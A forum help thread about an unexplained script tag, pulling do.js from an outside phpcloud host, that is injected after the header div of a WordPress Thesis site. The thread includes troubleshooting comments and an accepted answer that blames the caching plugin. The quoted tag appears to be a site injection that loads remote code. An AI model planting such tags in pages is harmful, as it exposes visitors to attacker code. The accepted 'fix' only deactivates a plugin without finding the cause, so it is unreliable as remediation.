# Weird Code Being Added to Wordpress Site [Thesis]

Tags: theme-thesis

Ok, so I'm totally confused on this and am looking for help. I have a site that is loading really slowly. I tracked the source of the slow load time is this call right here:

```
<script type="text/javascript"
src="http://googlecloud.my.phpcloud.com/do.js">
</script>
```

Funny thing is that it's getting added right after the  html code. I've looked all through my code in the Thesis theme, and I can't find where that code is being added. While looking at my thesis code, in the /lib/html/header.php file, I found this:

```
function thesis_header() {
    echo "\t<div id=\"header\">\n";
    thesis_hook_header();
    echo "\t</div>\n";
}
```

so I thought maybe that a piece of code was using the add_action('thesis_hook_header') call, however I did one more tweak.  I changed the output from id="header" to id="header1". As soon as I did this, the script code went away. So I'm thinking that there is some code that is looking for div id="header" and then putting the script right after it.  But for the life of my, I cannot find the piece of code that is doing it.  Has anyone had this problem before?

Comment: Switch to a standard (twentysomething) theme. If the problem persists, then it's a plugin issue. Disable all plugins, then reactivate each, checking each time to see if the problem is triggered. If the problem does not persist with a standard theme, then there is something awry in your theme.

Comment: Do you have SSH access? You could `cd` into your wordpress root directory and perform a `grep -Rn "http://googlecloud.my.phpcloud.com/do.js" *` to see if you can find which file/plugin is adding that to your site.

Answer (score 0, accepted):

Thanks for the help.  In this case, it looks like it's an issue with the supercache plugin. When it wasn't activated, the code isn't added. When it's activated, the code is added.

Still not sure how or why it was added, but at least It's not showing up now.